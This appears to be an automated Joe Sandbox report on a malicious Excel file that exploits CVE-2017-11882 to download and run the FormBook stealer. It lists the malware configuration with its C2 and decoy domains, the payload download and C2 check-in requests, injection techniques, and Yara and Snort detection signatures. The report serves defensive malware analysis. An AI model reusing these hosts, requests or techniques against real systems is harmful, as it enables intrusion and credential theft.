Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report L2.xlsx

Overview

General Information

Sample Name:L2.xlsx
Analysis ID:433039
MD5:e5aaa3f2879244a0b44b27ce151e0c29
SHA1:eb0608507f6aa9432f276ab6fcaeddc7439bf169
SHA256:d9aa9baf5698eebd324bf2d501d72a62ce6973eeb42a7dce961d0e65baaad67f
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2596 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2844 cmdline: 'C:\Users\Public\vbc.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
      • vbc.exe (PID: 2888 cmdline: 'C:\Users\Public\vbc.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • control.exe (PID: 2444 cmdline: C:\Windows\SysWOW64\control.exe MD5: 9130377F87A2153FEAB900A00EA1EBFF)
            • cmd.exe (PID: 2264 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.510000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.510000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.510000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.173.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2596, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2596, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2844
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2596, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2844

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exeMetadefender: Detection: 17%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\Public\vbc.exeMetadefender: Detection: 17%Perma Link
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted fileShow sources
          Source: L2.xlsxVirustotal: Detection: 30%Perma Link
          Source: L2.xlsxReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.vbc.exe.5b7268.1.unpackAvira: Label: TR/Dropper.Gen
          Source: 7.0.control.exe.c20000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 4.2.vbc.exe.510000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.2557960.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.control.exe.5f2210.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.vbc.exe.880000.2.unpackAvira: Label: TR/Dropper.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.c20000.1.unpackAvira: Label: TR/Dropper.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.alberthospice.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 192.210.173.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.alberthospice.com/sh2m/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.adultvideolife.xyz
          Source: C:\Windows\SysWOW64\control.exeDNS query: www.adultvideolife.xyz
          Source: C:\Windows\SysWOW64\control.exeDNS query: www.adultvideolife.xyz
          Source: C:\Windows\SysWOW64\control.exeDNS query: www.adultvideolife.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:06:46 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:52:54 GMTETag: "36dc6-5c46b6262be11"Accept-Ranges: bytesContent-Length: 224710Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1Host: www.alberthospice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /files/loader2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F87218.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /files/loader2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1Host: www.alberthospice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.alberthospice.com
